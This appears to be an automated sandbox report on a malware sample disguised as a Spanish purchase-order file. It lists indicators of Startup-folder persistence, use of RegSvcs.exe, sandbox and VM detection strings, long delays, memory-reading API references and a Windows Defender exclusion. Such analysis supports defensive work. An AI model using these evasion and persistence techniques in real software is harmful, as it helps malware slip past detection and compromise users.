Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: NUEVA ORDEN DE COMPRAsxlx..exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory allocated: 14F7A320000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Memory allocated: 14F7BC90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Memory allocated: 28B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Memory allocated: 25D0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599759	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599622	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595691	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1956	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7269	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1686	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2316	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7507	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep count: 1686 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe TID: 404	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599759	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599622	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595691	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe	Thread delayed: delay time: 922337203685477

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.15.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.15.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: RegSvcs.exe, 00000009.00000002.1414987538.0000000003A45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4EqEMUU
Source: Amcache.hve.15.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: Amcache.hve.15.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: vmci.sys
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.15.dr	Binary or memory string: vmci.syshbin`
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.15.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.15.dr	Binary or memory string: VMware-42 27 9c 31 6b 7d 78 89-be 90 b3 22 a5 ab 1b 52
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: NUEVA ORDEN DE COMPRAsxlx..exe, 00000003.00000002.1481771109.0000014F00044000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.15.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegSvcs.exe, 00000009.00000002.1414987538.0000000003A45000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HsqEMUU
Source: RegSvcs.exe, 00000010.00000002.2535503482.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
Source: Amcache.hve.15.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 16_2_00DE54E8 LdrInitializeThunk,

16_2_00DE54E8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\NUEVA ORDEN DE COMPRAsxlx..exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 9.2.RegSvcs.exe.5210000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.RegSvcs.exe.5210000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 9.2.RegSvcs.exe.5210000.7.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)

Adds a directory exclusion to Windows Defender

